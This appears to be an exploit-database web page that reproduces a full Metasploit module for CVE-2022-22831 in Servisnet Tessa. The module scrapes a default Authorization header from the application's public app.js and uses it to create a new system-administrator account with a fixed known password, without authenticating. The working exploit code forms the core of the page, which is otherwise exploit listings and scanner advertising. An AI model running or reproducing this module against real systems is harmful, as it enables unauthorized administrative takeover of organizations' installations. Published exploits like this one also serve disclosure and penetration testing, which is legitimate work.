servisnet tessa add sysadmin user (unauthenticated) (metasploit)

▸▸▸ Exploit & Vulnerability >> webapps exploit & multiple vulnerability

Online Vulnerability Scanner Tools

Code...

				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',
      'Description'    => %q(
        This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.
		The app.js is publicly available which acts as the backend of the application.
                By exposing a default value for the "Authorization" HTTP header, 
                it is possible to make unauthenticated requests to some areas of the application. 
                Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
                A new admin user can be added to the database with this header obtained in the source code.		

      ),
      'References'     =>
        [
          [ 'CVE', 'CVE-2022-22831' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],
          [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Dec 22 2021",
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        }
    ))

    register_options([
        OptString.new('TARGETURI',  [true, 'Base path for application', '/'])
    ])
  end
  # split strings to salt
  def split(data, string_to_split)  
    word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
    string = word.split('"]').join('').split('["').join('')
    return string
  end 
  # for Origin and Referer headers

  def app_path
    res = send_request_cgi({
    # default.a.get( check 
      'uri'     => normalize_uri(target_uri.path, 'js', 'app.js'),
	  'method'  => 'GET'
    })  	
	
    if res && res.code == 200 && res.body =~ /baseURL/
      data = res.body
      #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
      base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]
      print_status("baseURL: #{base_url}")  
      return base_url
    else
      fail_with(Failure::NotVulnerable, 'baseURL not found!')
    end
  end

  def add_user
     token = auth_bypass
     newuser = Rex::Text.rand_text_alpha_lower(8)	
     id = Rex::Text.rand_text_numeric(4)   
     # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
     json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'

     res = send_request_cgi(
       {
       'method' => 'POST',
       'ctype'  => 'application/json',
       'uri' => normalize_uri(target_uri.path, app_path, 'users'),
       'headers' =>
         {
           'Authorization' => token
         },
       'data' => json_data
      })

      if res && res.code == 200 && res.body =~ /localhost/
        print_good("The sysAdmin authorized user has been successfully added.")
        print_status("Username: #{newuser}")
        print_status("Password: 1111111111")
      else
        fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
      end
  end

  def auth_bypass

    res = send_request_cgi({
    # default.a.defaults.headers.post["Authorization"] check 
      'uri'     => normalize_uri(target_uri.path, 'js', 'app.js'),
	  'method'  => 'GET'
    })  	
	
    if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
	  token = split(res.body, 'Authorization')
	  print_status("Authorization: #{token}")  
          return token
	else
	  fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
	end

  end

  def check 	
	
    if auth_bypass =~ /Basic/ 
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
  
  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    add_user    
  end
end

Servisnet tessa add sysadmin user (unauthenticated) (metasploit) Vulnerability / Exploit Source : Servisnet tessa add sysadmin user (unauthenticated) (metasploit)

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.